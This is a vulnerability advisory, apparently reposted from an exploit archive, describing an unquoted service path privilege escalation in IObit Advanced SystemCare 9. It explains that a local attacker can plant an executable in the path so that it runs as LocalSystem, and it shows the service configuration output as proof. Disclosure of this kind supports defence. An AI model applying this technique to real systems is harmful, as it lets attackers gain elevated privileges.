IObit Advanced SystemCare 9 Unquoted Service Path Privilege Escalation Vulnerability

#######################################################

# Exploit Title: IObit Advanced SystemCare 9 Unquoted Service Path Privilege Escalation
# Date: 19/10/2016
# Exploit Author: Federico Zambito
# Vendor Homepage: http://www.iobit.com/
# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php
# Version: 9
# Tested on: Windows 7
########################################################


IObit Advanced SystemCare installs two service with an unquoted service path.

To properly exploit this vulnerability,the local attacker must insert an executable file in the path of the service.

Upon service restart or system reboot, the malicious code will be run with elevated privileges.


C:\>sc qc AdvancedSystemCareService9

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
        LOAD_ORDER_GROUP   : System Reserved
        TAG                : 1
        DISPLAY_NAME       : Advanced SystemCare Service 9
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

-------------------------------------------------------------------------------------

C:\> sc qc LiveUpdateSvc

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: LiveUpdateSvc
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : LiveUpdate
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

#  0day.today [2018-02-06]  #